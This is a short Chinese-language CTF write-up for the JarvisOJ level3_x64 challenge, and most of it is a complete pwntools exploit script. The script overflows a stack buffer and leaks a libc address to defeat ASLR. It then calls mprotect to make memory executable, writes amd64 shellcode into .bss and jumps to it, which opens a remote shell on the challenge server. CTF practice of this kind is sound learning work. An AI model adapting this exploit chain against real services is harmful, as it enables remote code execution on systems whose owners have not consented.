本着纸上得来终觉浅,绝知此事要躬行的原则,把一个简单的ROP做了一下。漏洞很明显,libc有给出;唯一的限制就是不允许调用system或execve,而是用mprotect或者mmap
脚本调了半天,最后发现是shellcode的问题;这里边的一个坑是shellcraft.sh()要指定一个目标平台的架构,没用过shellcraft模块,连这么简单的错都犯,汗-_-||
from pwn import * context.log_level='DEBUG' r=remote('pwn2.jarvisoj.com',9883) #r=process('./level3_x64',env={"LD_PRELOAD":"/root/JarvisOJ/level3_x64/libc-2.19.so"}) file=ELF('./level3_x64') libc=ELF('./libc-2.19.so') prdi=0x4006b3 prsi=0x4006b1 bss_start=0x600A88 start_addr=0x4004F0 ''' 0x00000000004006b1 : pop rsi ; pop r15 ; ret 0x0000000000001b8e : pop rdx ; ret ''' payload1='a'*0x80+'b'*8+p64(prdi)+p64(1)+p64(prsi)+p64(file.got['write'])+'c'*8+p64(file.plt['write']) payload1+=p64(start_addr) r.recvuntil(' ') r.send(payload1) write_got=u64(r.recv(8)) sleep(1) libc_base=write_got-libc.sym['write'] mprotect=libc_base+libc.sym['mprotect'] prdx=libc_base+0x1b8e print hex(libc_base) print hex(mprotect) print hex(prdx) payload2='a'*0x80+'b'*8+p64(prdi)+p64(0x600000)+p64(prsi)+p64(0x1000)+'c'*8+p64(prdx)+p64(7)+p64(mprotect)+p64(start_addr) r.recvuntil(' ') r.send(payload2) sleep(1) #gdb.attach(r) payload3='a'*0x80+'b'*8+p64(prdi)+p64(0)+p64(prsi)+p64(bss_start)+'c'*8+p64(prdx)+p64(48)+p64(file.plt['read'])+p64(start_addr) r.recvuntil(' ') r.send(payload3) sleep(1) r.send(asm(shellcraft.amd64.linux.sh(),arch='amd64')) #gdb.attach(r) payload4='a'*0x80+'b'*8+p64(bss_start) r.recvuntil(' ') r.send(payload4) r.interactive()